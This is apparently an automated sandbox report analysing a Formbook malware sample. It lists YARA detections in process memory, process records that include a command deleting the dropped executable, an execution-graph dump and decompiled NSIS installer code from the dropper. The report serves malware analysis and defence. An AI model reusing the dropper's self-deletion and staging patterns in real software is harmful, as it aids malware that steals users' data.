                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:high

                                                        Target ID:8
                                                        Start time:21:20:52
                                                        Start date:27/05/2022
                                                        Path:C:\Windows\SysWOW64\wuapp.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\wuapp.exe
                                                        Imagebase:0xb30000
                                                        File size:35328 bytes
                                                        MD5 hash:C8EBA45CEF271BED6C2F0E1965D229EA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        Target ID:9
                                                        Start time:21:20:57
                                                        Start date:27/05/2022
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"
                                                        Imagebase:0x4a830000
                                                        File size:302592 bytes
                                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                          Execution Graph

                                                          Execution Coverage:15.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:21.1%
                                                          Total number of Nodes:1254
                                                          Total number of Limit Nodes:25
calls 3994->3995 3995->3993 3996->3998 3997 4022b2 4000 402a85 17 API calls 3997->4000 3998->3997 3999 402a85 17 API calls 3998->3999 3999->3997 4001 4022bb WritePrivateProfileStringA 4000->4001 4002 404009 lstrcpynA lstrlenA 4003 40230a 4004 40233a 4003->4004 4005 40230f 4003->4005 4007 402a85 17 API calls 4004->4007 4014 402b8f 4005->4014 4009 402341 4007->4009 4008 402316 4010 402a85 17 API calls 4008->4010 4013 402357 4008->4013 4018 402ac5 RegOpenKeyExA 4009->4018 4011 402327 RegDeleteValueA RegCloseKey 4010->4011 4011->4013 4015 402a85 17 API calls 4014->4015 4016 402ba8 4015->4016 4017 402bb6 RegOpenKeyExA 4016->4017 4017->4008 4019 402b3c 4018->4019 4022 402af0 4018->4022 4019->4013 4020 402b16 RegEnumKeyA 4021 402b28 RegCloseKey 4020->4021 4020->4022 4024 405dda 3 API calls 4021->4024 4022->4020 4022->4021 4023 402b4d RegCloseKey 4022->4023 4025 402ac5 3 API calls 4022->4025 4023->4019 4026 402b38 4024->4026 4025->4022 4026->4019 4027 402b68 RegDeleteKeyA 4026->4027 4027->4019 4028 40248a 4029 402b8f 18 API calls 4028->4029 4030 402494 4029->4030 4031 402a68 17 API calls 4030->4031 4032 40249d 4031->4032 4033 4024c0 RegEnumValueA 4032->4033 4034 4024b4 RegEnumKeyA 4032->4034 4035 4026bf 4032->4035 4033->4035 4036 4024d9 RegCloseKey 4033->4036 4034->4036 4036->4035 4038 40280c 4039 402a68 17 API calls 4038->4039 4040 402812 4039->4040 4041 402836 4040->4041 4042 40284d 4040->4042 4048 4026bf 4040->4048 4043 40284a 4041->4043 4044 40283b 4041->4044 4045 402863 4042->4045 4046 402857 4042->4046 4053 405a52 wsprintfA 4043->4053 4052 405af4 lstrcpynA 4044->4052 4047 405b16 17 API calls 4045->4047 4049 402a68 17 API calls 4046->4049 4047->4048 4049->4048 4052->4048 4053->4048 4061 401d0e GetDlgItem GetClientRect 4062 402a85 17 API calls 4061->4062 4063 401d3e LoadImageA SendMessageA 4062->4063 4064 40291a 4063->4064 4065 401d5c DeleteObject 4063->4065 4065->4064 4066 401e0e 4067 402a85 17 API calls 4066->4067 4068 401e14 4067->4068 4069 402a85 17 API calls 
4068->4069 4070 401e1d 4069->4070 4071 402a85 17 API calls 4070->4071 4072 401e26 wsprintfA 4071->4072 4073 401423 24 API calls 4072->4073 4074 401e44 ShellExecuteA 4073->4074 4075 401e71 4074->4075 4076 401490 4077 404e9f 24 API calls 4076->4077 4078 401497 4077->4078 4079 402412 4080 402b8f 18 API calls 4079->4080 4081 40241c 4080->4081 4082 402a85 17 API calls 4081->4082 4083 402425 4082->4083 4084 4026bf 4083->4084 4085 40242f RegQueryValueExA 4083->4085 4086 40244f 4085->4086 4087 402455 RegCloseKey 4085->4087 4086->4087 4090 405a52 wsprintfA 4086->4090 4087->4084 4090->4087 4091 402892 4092 402a68 17 API calls 4091->4092 4093 402898 4092->4093 4094 4028c9 4093->4094 4095 4026bf 4093->4095 4097 4028a6 4093->4097 4094->4095 4096 405b16 17 API calls 4094->4096 4096->4095 4097->4095 4099 405a52 wsprintfA 4097->4099 4099->4095 4100 40151d SetForegroundWindow 4101 40291a 4100->4101 4102 40149d 4103 4014ab PostQuitMessage 4102->4103 4104 402271 4102->4104 4103->4104 4105 40159d 4106 402a85 17 API calls 4105->4106 4107 4015a4 SetFileAttributesA 4106->4107 4108 4015b6 4107->4108 4109 401f20 4110 402a85 17 API calls 4109->4110 4111 401f27 GetFileVersionInfoSizeA 4110->4111 4112 401f4a GlobalAlloc 4111->4112 4113 401fa0 4111->4113 4112->4113 4114 401f5e GetFileVersionInfoA 4112->4114 4114->4113 4115 401f6f VerQueryValueA 4114->4115 4115->4113 4116 401f88 4115->4116 4120 405a52 wsprintfA 4116->4120 4118 401f94 4121 405a52 wsprintfA 4118->4121 4120->4118 4121->4113 4122 402521 4123 402526 4122->4123 4124 402537 4122->4124 4125 402a68 17 API calls 4123->4125 4126 402a85 17 API calls 4124->4126 4129 40252d 4125->4129 4127 40253e lstrlenA 4126->4127 4127->4129 4128 4026bf 4129->4128 4130 40255d WriteFile 4129->4130 4130->4128 4131 4026a1 4132 402a85 17 API calls 4131->4132 4133 4026a8 FindFirstFileA 4132->4133 4134 4026cb 4133->4134 4138 4026bb 4133->4138 4135 4026d2 4134->4135 4139 405a52 wsprintfA 4134->4139 4140 405af4 lstrcpynA 4135->4140 4139->4135 4140->4138 2880 
403a22 2881 403b75 2880->2881 2882 403a3a 2880->2882 2884 403bc6 2881->2884 2885 403b86 GetDlgItem GetDlgItem 2881->2885 2882->2881 2883 403a46 2882->2883 2886 403a51 SetWindowPos 2883->2886 2887 403a64 2883->2887 2889 403c20 2884->2889 2979 401389 2884->2979 2976 403ef5 2885->2976 2886->2887 2890 403a81 2887->2890 2891 403a69 ShowWindow 2887->2891 2898 403b70 2889->2898 2953 403f41 2889->2953 2894 403aa3 2890->2894 2895 403a89 DestroyWindow 2890->2895 2891->2890 2892 403bb0 SetClassLongA 2896 40140b 2 API calls 2892->2896 2900 403aa8 SetWindowLongA 2894->2900 2901 403ab9 2894->2901 2899 403e9f 2895->2899 2896->2884 2899->2898 2908 403eaf ShowWindow 2899->2908 2900->2898 2905 403b62 2901->2905 2906 403ac5 GetDlgItem 2901->2906 2903 40140b 2 API calls 2921 403c32 2903->2921 2904 403e80 DestroyWindow EndDialog 2904->2899 2962 403f5c 2905->2962 2909 403af5 2906->2909 2910 403ad8 SendMessageA IsWindowEnabled 2906->2910 2907 403bfc SendMessageA 2907->2898 2908->2898 2913 403b02 2909->2913 2914 403b15 2909->2914 2915 403b49 SendMessageA 2909->2915 2924 403afa 2909->2924 2910->2898 2910->2909 2913->2915 2913->2924 2918 403b32 2914->2918 2919 403b1d 2914->2919 2915->2905 2917 403ef5 18 API calls 2917->2921 2923 40140b 2 API calls 2918->2923 2956 40140b 2919->2956 2920 403b30 2920->2905 2921->2903 2921->2904 2921->2917 2926 403ef5 18 API calls 2921->2926 2983 405b16 2921->2983 2925 403b39 2923->2925 2959 403ece 2924->2959 2925->2905 2925->2924 2927 403cad GetDlgItem 2926->2927 2928 403cc2 2927->2928 2929 403cca ShowWindow EnableWindow 2927->2929 2928->2929 3000 403f17 EnableWindow 2929->3000 2931 403cf4 EnableWindow 2934 403d08 2931->2934 2932 403d0d GetSystemMenu EnableMenuItem SendMessageA 2933 403d3d SendMessageA 2932->2933 2932->2934 2933->2934 2934->2932 3001 403f2a SendMessageA 2934->3001 3002 405af4 lstrcpynA 2934->3002 2937 403d6b lstrlenA 2938 405b16 17 API calls 2937->2938 2939 403d7c SetWindowTextA 2938->2939 2940 401389 2 API calls 2939->2940 2942 403d8d 
2940->2942 2941 403dc0 DestroyWindow 2941->2899 2943 403dda CreateDialogParamA 2941->2943 2942->2898 2942->2921 2942->2941 2944 403dbb 2942->2944 2943->2899 2945 403e0d 2943->2945 2944->2898 2946 403ef5 18 API calls 2945->2946 2947 403e18 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2946->2947 2948 401389 2 API calls 2947->2948 2949 403e5e 2948->2949 2949->2898 2950 403e66 ShowWindow 2949->2950 2951 403f41 SendMessageA 2950->2951 2952 403e7e 2951->2952 2952->2899 2954 403f59 2953->2954 2955 403f4a SendMessageA 2953->2955 2954->2921 2955->2954 2957 401389 2 API calls 2956->2957 2958 401420 2957->2958 2958->2924 2960 403ed5 2959->2960 2961 403edb SendMessageA 2959->2961 2960->2961 2961->2920 2963 403ffd 2962->2963 2964 403f74 GetWindowLongA 2962->2964 2963->2898 2964->2963 2965 403f85 2964->2965 2966 403f94 GetSysColor 2965->2966 2967 403f97 2965->2967 2966->2967 2968 403fa7 SetBkMode 2967->2968 2969 403f9d SetTextColor 2967->2969 2970 403fc5 2968->2970 2971 403fbf GetSysColor 2968->2971 2969->2968 2972 403fd6 2970->2972 2973 403fcc SetBkColor 2970->2973 2971->2970 2972->2963 2974 403ff0 CreateBrushIndirect 2972->2974 2975 403fe9 DeleteObject 2972->2975 2973->2972 2974->2963 2975->2974 2977 405b16 17 API calls 2976->2977 2978 403f00 SetDlgItemTextA 2977->2978 2978->2892 2980 401390 2979->2980 2981 4013fe 2980->2981 2982 4013cb MulDiv SendMessageA 2980->2982 2981->2889 2981->2907 2982->2980 2999 405b26 2983->2999 2984 405cea 2985 405cff 2984->2985 3019 405af4 lstrcpynA 2984->3019 2985->2921 2987 405cc1 lstrlenA 2987->2999 2989 405bfe GetSystemDirectoryA 2989->2999 2991 405b16 10 API calls 2991->2987 2993 405c11 GetWindowsDirectoryA 2993->2999 2994 405c21 SHGetSpecialFolderLocation 2995 405c3a SHGetPathFromIDListA CoTaskMemFree 2994->2995 2994->2999 2995->2999 2996 405c68 lstrcatA 2996->2999 2998 405b16 10 API calls 2998->2999 2999->2984 2999->2987 2999->2989 2999->2991 2999->2993 2999->2994 2999->2996 2999->2998 3003 4059db RegOpenKeyExA 2999->3003 3008 405d03 
2999->3008 3017 405a52 wsprintfA 2999->3017 3018 405af4 lstrcpynA 2999->3018 3000->2931 3001->2934 3002->2937 3004 405a4c 3003->3004 3005 405a0e RegQueryValueExA 3003->3005 3004->2999 3006 405a2f RegCloseKey 3005->3006 3006->3004 3015 405d0f 3008->3015 3009 405d77 3010 405d7b CharPrevA 3009->3010 3013 405d96 3009->3013 3010->3009 3011 405d6c CharNextA 3011->3009 3011->3015 3013->2999 3014 405d5a CharNextA 3014->3015 3015->3009 3015->3011 3015->3014 3016 405d67 CharNextA 3015->3016 3020 405612 3015->3020 3016->3011 3017->2999 3018->2999 3019->2985 3021 405618 3020->3021 3022 40562b 3021->3022 3023 40561e CharNextA 3021->3023 3022->3015 3023->3021 4148 401923 4149 40195a 4148->4149 4150 402a85 17 API calls 4149->4150 4151 40195f 4150->4151 4152 405426 69 API calls 4151->4152 4153 401968 4152->4153 4159 404626 4160 404652 4159->4160 4161 404636 4159->4161 4162 404685 4160->4162 4163 404658 SHGetPathFromIDListA 4160->4163 4170 4053a6 GetDlgItemTextA 4161->4170 4165 40466f SendMessageA 4163->4165 4166 404668 4163->4166 4165->4162 4168 40140b 2 API calls 4166->4168 4167 404643 SendMessageA 4167->4160 4168->4165 4170->4167 4171 401926 4172 402a85 17 API calls 4171->4172 4173 40192d 4172->4173 4174 4053c2 MessageBoxIndirectA 4173->4174 4175 401936 4174->4175 4176 40152b 4177 402a68 17 API calls 4176->4177 4178 401532 4177->4178 4179 401fab SetErrorMode 4180 402061 4179->4180 4181 401fc8 4179->4181 4183 401423 24 API calls 4180->4183 4182 402a85 17 API calls 4181->4182 4184 401fcf 4182->4184 4185 40206c SetErrorMode 4183->4185 4186 402a85 17 API calls 4184->4186 4187 40291a 4185->4187 4188 401fd7 4186->4188 4189 401fec LoadLibraryExA 4188->4189 4190 401fdf GetModuleHandleA 4188->4190 4189->4180 4191 401ffc GetProcAddress 4189->4191 4190->4189 4190->4191 4192 402049 4191->4192 4193 40200c 4191->4193 4194 404e9f 24 API calls 4192->4194 4195 401423 24 API calls 4193->4195 4196 40201c 4193->4196 4194->4196 4195->4196 4196->4185 4197 402058 FreeLibrary 4196->4197 4197->4185 4198 
40262f 4199 402636 4198->4199 4201 4028c7 4198->4201 4200 402a68 17 API calls 4199->4200 4202 402641 4200->4202 4203 402648 SetFilePointer 4202->4203 4203->4201 4204 402658 4203->4204 4206 405a52 wsprintfA 4204->4206 4206->4201 4207 401b30 4208 402a85 17 API calls 4207->4208 4209 401b37 4208->4209 4210 402a68 17 API calls 4209->4210 4211 401b40 wsprintfA 4210->4211 4212 40291a 4211->4212 4213 401a31 4214 402a85 17 API calls 4213->4214 4215 401a3a ExpandEnvironmentStringsA 4214->4215 4216 401a4e 4215->4216 4218 401a61 4215->4218 4217 401a53 lstrcmpA 4216->4217 4216->4218 4217->4218 4219 404333 4220 404371 4219->4220 4221 404364 4219->4221 4222 40437a GetDlgItem 4220->4222 4229 4043dd 4220->4229 4276 4053a6 GetDlgItemTextA 4221->4276 4225 40438c 4222->4225 4224 40436b 4227 405d03 5 API calls 4224->4227 4228 4043a0 SetWindowTextA 4225->4228 4231 40567b 4 API calls 4225->4231 4226 4044bf 4274 40460b 4226->4274 4278 4053a6 GetDlgItemTextA 4226->4278 4227->4220 4233 403ef5 18 API calls 4228->4233 4229->4226 4234 405b16 17 API calls 4229->4234 4229->4274 4236 404396 4231->4236 4232 403f5c 8 API calls 4237 40461f 4232->4237 4238 4043c0 4233->4238 4239 404451 SHBrowseForFolderA 4234->4239 4235 4044ee 4240 4056c8 20 API calls 4235->4240 4236->4228 4244 4055e7 3 API calls 4236->4244 4241 403ef5 18 API calls 4238->4241 4239->4226 4242 404469 CoTaskMemFree 4239->4242 4243 4044f4 4240->4243 4245 4043d0 4241->4245 4246 4055e7 3 API calls 4242->4246 4279 405af4 lstrcpynA 4243->4279 4244->4228 4277 403f2a SendMessageA 4245->4277 4248 404476 4246->4248 4251 4044ad SetDlgItemTextA 4248->4251 4255 405b16 17 API calls 4248->4255 4250 4043d6 4253 405dda 3 API calls 4250->4253 4251->4226 4252 40450b 4254 40567b 4 API calls 4252->4254 4253->4229 4256 404511 4254->4256 4257 404495 lstrcmpiA 4255->4257 4259 405dda 3 API calls 4256->4259 4257->4251 4258 4044a6 lstrcatA 4257->4258 4258->4251 4260 40451f 4259->4260 4261 40454a GetDiskFreeSpaceA 4260->4261 4263 40453b 4260->4263 4262 404565 
MulDiv 4261->4262 4261->4263 4262->4263 4264 4045ba 4263->4264 4265 40468c 20 API calls 4263->4265 4266 4045dd 4264->4266 4268 40140b 2 API calls 4264->4268 4267 4045ac 4265->4267 4280 403f17 EnableWindow 4266->4280 4270 4045b1 4267->4270 4271 4045bc SetDlgItemTextA 4267->4271 4268->4266 4273 40468c 20 API calls 4270->4273 4271->4264 4272 4045f9 4272->4274 4281 4042c8 4272->4281 4273->4264 4274->4232 4276->4224 4277->4250 4278->4235 4279->4252 4280->4272 4282 4042d6 4281->4282 4283 4042db SendMessageA 4281->4283 4282->4283 4283->4274 4284 4014b7 4285 4014bd 4284->4285 4286 401389 2 API calls 4285->4286 4287 4014c5 4286->4287 4302 401cba 4303 402a68 17 API calls 4302->4303 4304 401cc0 IsWindow 4303->4304 4305 401a21 4304->4305 3433 4015bb 3434 402a85 17 API calls 3433->3434 3435 4015c2 3434->3435 3436 40567b 4 API calls 3435->3436 3446 4015ca 3436->3446 3437 401612 3438 401635 3437->3438 3439 401617 3437->3439 3443 401423 24 API calls 3438->3443 3451 401423 3439->3451 3440 405612 CharNextA 3442 4015d8 CreateDirectoryA 3440->3442 3445 4015ed GetLastError 3442->3445 3442->3446 3450 4021bf 3443->3450 3445->3446 3447 4015fa GetFileAttributesA 3445->3447 3446->3437 3446->3440 3447->3446 3449 401629 SetCurrentDirectoryA 3449->3450 3452 404e9f 24 API calls 3451->3452 3453 401431 3452->3453 3454 405af4 lstrcpynA 3453->3454 3454->3449 4306 40163c 4307 402a85 17 API calls 4306->4307 4308 401642 4307->4308 4309 405d9c 4 API calls 4308->4309 4310 401648 4309->4310 4311 40403d 4312 404053 4311->4312 4317 404160 4311->4317 4315 403ef5 18 API calls 4312->4315 4313 4041cf 4314 4042a3 4313->4314 4316 4041d9 GetDlgItem 4313->4316 4322 403f5c 8 API calls 4314->4322 4318 4040a9 4315->4318 4319 404261 4316->4319 4320 4041ef 4316->4320 4317->4313 4317->4314 4321 4041a4 GetDlgItem SendMessageA 4317->4321 4323 403ef5 18 API calls 4318->4323 4319->4314 4325 404273 4319->4325 4320->4319 4324 404215 6 API calls 4320->4324 4342 403f17 EnableWindow 4321->4342 4327 40429e 4322->4327 4328 4040b6 
CheckDlgButton 4323->4328 4324->4319 4329 404279 SendMessageA 4325->4329 4330 40428a 4325->4330 4340 403f17 EnableWindow 4328->4340 4329->4330 4330->4327 4333 404290 SendMessageA 4330->4333 4331 4041ca 4334 4042c8 SendMessageA 4331->4334 4333->4327 4334->4313 4335 4040d4 GetDlgItem 4341 403f2a SendMessageA 4335->4341 4337 4040ea SendMessageA 4338 404111 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4337->4338 4339 404108 GetSysColor 4337->4339 4338->4327 4339->4338 4340->4335 4341->4337 4342->4331

                                                          Control-flow Graph

                                                          [Figure: control-flow graph, first block 4032fa-403378; legend: Executed / Not Executed]
                                                          C-Code - Quality: 68%
                                                          			_entry_() {
                                                          				struct _SHFILEINFOA _v356;
                                                          				struct _SECURITY_ATTRIBUTES* _v376;
                                                          				char _v380;
                                                          				CHAR* _v384;
                                                          				char _v392;
                                                          				int _v396;
                                                          				int _v400;
                                                          				signed int _v404;
                                                          				CHAR* _v408;
                                                          				int _v412;
                                                          				intOrPtr _v416;
                                                          				struct _SECURITY_ATTRIBUTES* _v424;
                                                          				void* _v432;
                                                          				intOrPtr _t34;
                                                          				CHAR* _t38;
                                                          				char* _t41;
                                                          				signed int _t43;
                                                          				void* _t47;
                                                          				int _t49;
                                                          				signed int _t50;
                                                          				signed int _t53;
                                                          				int _t54;
                                                          				signed int _t58;
                                                          				void* _t77;
                                                          				void* _t87;
                                                          				void* _t89;
                                                          				char* _t94;
                                                          				signed int _t95;
                                                          				void* _t96;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				signed int _t101;
                                                          				CHAR* _t103;
                                                          				signed int _t104;
                                                          				void* _t105;
                                                          				char _t118;
                                                          
                                                          				_t105 =  &_v384;
                                                          				_v376 = 0;
                                                          				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                                          				_t97 = 0;
                                                          				_v380 = 0x20;
                                                          				__imp__#17();
                                                          				__imp__OleInitialize(0); // executed
                                                          				 *0x423fd4 = _t34;
                                                          				SHGetFileInfoA(0x41f4e8, 0,  &_v356, 0x160, 0); // executed
                                                          				E00405AF4(0x423720, "NSIS Error");
                                                          				_t38 = GetCommandLineA();
                                                          				_t94 = "C:\\Users\\Albus\\AppData\\Roaming\\word.exe";
                                                          				E00405AF4(_t94, _t38);
                                                          				 *0x423f20 = GetModuleHandleA(0);
                                                          				_t41 = _t94;
                                                          				if("C:\\Users\\Albus\\AppData\\Roaming\\word.exe" == 0x22) {
                                                          					_v404 = 0x22;
                                                          					_t41 =  &M00429001;
                                                          				}
                                                          				_t43 = CharNextA(E00405612(_t41, _v404));
                                                          				_v404 = _t43;
                                                          				while(1) {
                                                          					_t89 =  *_t43;
                                                          					_t107 = _t89;
                                                          					if(_t89 == 0) {
                                                          						break;
                                                          					}
                                                          					__eflags = _t89 - 0x20;
                                                          					if(_t89 != 0x20) {
                                                          						L5:
                                                          						__eflags =  *_t43 - 0x22;
                                                          						_v404 = 0x20;
                                                          						if( *_t43 == 0x22) {
                                                          							_t43 = _t43 + 1;
                                                          							__eflags = _t43;
                                                          							_v404 = 0x22;
                                                          						}
                                                          						__eflags =  *_t43 - 0x2f;
                                                          						if( *_t43 != 0x2f) {
                                                          							L15:
                                                          							_t43 = E00405612(_t43, _v404);
                                                          							__eflags =  *_t43 - 0x22;
                                                          							if(__eflags == 0) {
                                                          								_t43 = _t43 + 1;
                                                          								__eflags = _t43;
                                                          							}
                                                          							continue;
                                                          						} else {
                                                          							_t43 = _t43 + 1;
                                                          							__eflags =  *_t43 - 0x53;
                                                          							if( *_t43 == 0x53) {
                                                          								__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
                                                          								if(( *(_t43 + 1) | 0x00000020) == 0x20) {
                                                          									_t97 = _t97 | 0x00000002;
                                                          									__eflags = _t97;
                                                          								}
                                                          							}
                                                          							__eflags =  *_t43 - 0x4352434e;
                                                          							if( *_t43 == 0x4352434e) {
                                                          								__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
                                                          								if(( *(_t43 + 4) | 0x00000020) == 0x20) {
                                                          									_t97 = _t97 | 0x00000004;
                                                          									__eflags = _t97;
                                                          								}
                                                          							}
                                                          							__eflags =  *((intOrPtr*)(_t43 - 2)) - 0x3d442f20;
                                                          							if( *((intOrPtr*)(_t43 - 2)) == 0x3d442f20) {
                                                          								 *((intOrPtr*)(_t43 - 2)) = 0;
                                                          								__eflags = _t43 + 2;
                                                          								E00405AF4("C:\\Users\\Albus\\AppData\\Local\\Temp", _t43 + 2);
                                                          								L20:
                                                          								_t103 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                                          								GetTempPathA(0x400, _t103); // executed
                                                          								_t47 = E004032C6(_t107);
                                                          								_t108 = _t47;
                                                          								if(_t47 != 0) {
                                                          									L22:
                                                          									DeleteFileA("1033"); // executed
                                                          									_t49 = E00402C7D(_t109, _t97); // executed
                                                          									_v412 = _t49;
                                                          									if(_t49 != 0) {
                                                          										L32:
                                                          										ExitProcess(); // executed
                                                          										__imp__OleUninitialize(); // executed
                                                          										if(_v404 == 0) {
                                                          											__eflags =  *0x423fb4;
                                                          											if( *0x423fb4 != 0) {
                                                          												_t104 = E00405DDA(3);
                                                          												_t98 = E00405DDA(4);
                                                          												_t53 = E00405DDA(5);
                                                          												__eflags = _t104;
                                                          												_t95 = _t53;
                                                          												if(_t104 != 0) {
                                                          													__eflags = _t98;
                                                          													if(_t98 != 0) {
                                                          														__eflags = _t95;
                                                          														if(_t95 != 0) {
                                                          															_t58 =  *_t104(GetCurrentProcess(), 0x28,  &_v392);
                                                          															__eflags = _t58;
                                                          															if(_t58 != 0) {
                                                          																 *_t98(0, "SeShutdownPrivilege",  &_v396);
                                                          																_v412 = 1;
                                                          																_v400 = 2;
                                                          																 *_t95(_v416, 0,  &_v412, 0, 0, 0);
                                                          															}
                                                          														}
                                                          													}
                                                          												}
                                                          												_t54 = ExitWindowsEx(2, 0);
                                                          												__eflags = _t54;
                                                          												if(_t54 == 0) {
                                                          													E0040140B(9);
                                                          												}
                                                          											}
                                                          											_t50 =  *0x423fcc;
                                                          											__eflags = _t50 - 0xffffffff;
                                                          											if(_t50 != 0xffffffff) {
                                                          												_v396 = _t50;
                                                          											}
                                                          											ExitProcess(_v396);
                                                          										}
                                                          										E004053C2(_v404, 0x200010);
                                                          										ExitProcess(2);
                                                          									}
                                                          									if( *0x423f34 == 0) {
                                                          										L31:
                                                          										 *0x423fcc =  *0x423fcc | 0xffffffff;
                                                          										_v400 = E004036A1();
                                                          										goto L32;
                                                          									}
                                                          									_t101 = E00405612(_t94, 0);
                                                          									while(_t101 >= _t94) {
                                                          										__eflags =  *_t101 - 0x3d3f5f20;
                                                          										if(__eflags == 0) {
                                                          											break;
                                                          										}
                                                          										_t101 = _t101 - 1;
                                                          										__eflags = _t101;
                                                          									}
                                                          									_t113 = _t101 - _t94;
                                                          									_v408 = "Error launching installer";
                                                          									if(_t101 < _t94) {
                                                          										lstrcatA(_t103, "~nsu.tmp");
                                                          										if(lstrcmpiA(_t103, "C:\\Users\\Albus\\AppData\\Roaming") == 0) {
                                                          											goto L32;
                                                          										}
                                                          										CreateDirectoryA(_t103, 0);
                                                          										SetCurrentDirectoryA(_t103);
                                                          										_t118 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
                                                          										if(_t118 == 0) {
                                                          											E00405AF4("C:\\Users\\Albus\\AppData\\Local\\Temp", "C:\\Users\\Albus\\AppData\\Roaming");
                                                          										}
                                                          										E00405AF4(0x424000, _v396);
                                                          										 *0x424400 = 0x41;
                                                          										_t96 = 0x1a;
                                                          										do {
                                                          											_push( *((intOrPtr*)( *0x423f28 + 0x120)));
                                                          											_push(0x41f0e8);
                                                          											E00405B16(0, _t96, 0x41f0e8);
                                                          											DeleteFileA(0x41f0e8);
                                                          											if(_v416 != 0 && CopyFileA("C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x41f0e8, 1) != 0) {
                                                          												_push(0);
                                                          												_push(0x41f0e8);
                                                          												E00405842();
                                                          												_push( *((intOrPtr*)( *0x423f28 + 0x124)));
                                                          												_push(0x41f0e8);
                                                          												E00405B16(0, _t96, 0x41f0e8);
                                                          												_t77 = E00405361(0x41f0e8);
                                                          												if(_t77 != 0) {
                                                          													CloseHandle(_t77);
                                                          													 *((intOrPtr*)(_t105 + 0x10)) = 0;
                                                          												}
                                                          											}
                                                          											 *0x424400 =  *0x424400 + 1;
                                                          											_t96 = _t96 - 1;
                                                          										} while (_t96 != 0);
                                                          										_push(0);
                                                          										_push(_t103);
                                                          										E00405842();
                                                          										goto L32;
                                                          									}
                                                          									 *_t101 = 0;
                                                          									_t102 = _t101 + 4;
                                                          									if(E004056C8(_t113, _t101 + 4) == 0) {
                                                          										goto L32;
                                                          									}
                                                          									E00405AF4("C:\\Users\\Albus\\AppData\\Local\\Temp", _t102);
                                                          									E00405AF4("C:\\Users\\Albus\\AppData\\Local\\Temp", _t102);
                                                          									_v424 = 0;
                                                          									goto L31;
                                                          								}
                                                          								GetWindowsDirectoryA(_t103, 0x3fb);
                                                          								lstrcatA(_t103, "\\Temp");
                                                          								_t87 = E004032C6(_t108);
                                                          								_t109 = _t87;
                                                          								if(_t87 == 0) {
                                                          									goto L32;
                                                          								}
                                                          								goto L22;
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					} else {
                                                          						goto L4;
                                                          					}
                                                          					do {
                                                          						L4:
                                                          						_t43 = _t43 + 1;
                                                          						__eflags =  *_t43 - 0x20;
                                                          					} while ( *_t43 == 0x20);
                                                          					goto L5;
                                                          				}
                                                          				goto L20;
                                                          			}

                                                          APIs
                                                          • #17.COMCTL32 ref: 00403319
                                                          • OleInitialize.OLE32(00000000), ref: 00403320
                                                          • SHGetFileInfoA.SHELL32(0041F4E8,00000000,?,00000160,00000000), ref: 0040333C
                                                            • Part of subcall function 00405AF4: lstrcpynA.KERNEL32(?,?,00000400,00403351,00423720,NSIS Error), ref: 00405B01
                                                          • GetCommandLineA.KERNEL32(00423720,NSIS Error), ref: 00403351
                                                          • GetModuleHandleA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000000), ref: 00403364
                                                          • CharNextA.USER32(00000000), ref: 0040338F
                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403422
                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403437
                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403443
                                                          • DeleteFileA.KERNELBASE(1033), ref: 00403456
                                                          • ExitProcess.KERNELBASE(00000000), ref: 004034CF
                                                          • OleUninitialize.OLE32 ref: 004034D4
                                                          • ExitProcess.KERNEL32 ref: 004034F4
